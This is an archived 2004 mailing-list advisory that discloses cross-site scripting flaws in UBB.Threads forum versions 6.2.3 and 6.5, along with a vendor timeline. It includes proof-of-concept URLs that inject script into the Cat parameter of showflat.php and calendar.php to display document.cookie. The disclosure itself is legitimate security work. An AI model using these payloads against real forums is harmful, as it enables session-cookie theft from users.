[<prev] [next>] [day] [month] [year] [list]
Message-ID: <64135.217.83.135.119.1102930873.squirrel@webmail.catholic.org>
From: girl at catholic.org (gp)
Subject: Multiple XSS Vulnerabilities in several
UBB.Thread Versions
Vendor: Infopop
URL: http://www.infopop.com/
tested Versions: 6.2.3 & 6.5
remote: yes
vendor notified: 06 Dec 2004 at 01:08 AM
Vendor response: 06/07 Dec 2004 01:33 AM/06:08 PM
Update status: ..in process
============================================================
Summary:
~~~~~~~
UBBThreads is a High end forum system, powered under
PHP and MySQL with many attitude.
A security vulnerability in both (6.2.3 & 6.5) products
allow malicious users to steal session cookies, but
probably more versions are vulnerable.
============================================================
Examples in Version 6.2.3:
~~~~~~~~~~~~~~~~~~~~~~~~~~
[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));
tested modules are:
main, search, newuser, login, online, faq, ect..
Note:
~~~~
some of these were fixed in Version 6.5.
It follows the not fixed..
============================================================
Examples in version 6.5:
~~~~~~~~~~~~~~~~~~~~~~~~
[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));
[forum]/login.php?Cat=[XSS(s.a.)]
and:
[forum]/online.php?Cat=[XSS(s.a.)]
============================================================
Vendor:
~~~~~
Vulnerabilities will be fixed in the next release,
Version 6.5.1. Since March 2004, Infopop offers no longer
support for any version of UBB.classic or UBB.threads
prior to Version 6.0.
http://www.infopop.com/
http://www.ubbcentral.com/
============================================================
Credits:
~~~~~
dw.; ms.; ect.
--
kind regards
g@cat <-> MM
-----------------------------------------
This email was sent using FREE Catholic Online Webmail!
http://webmail.catholic.org/
Powered by blists - more mailing lists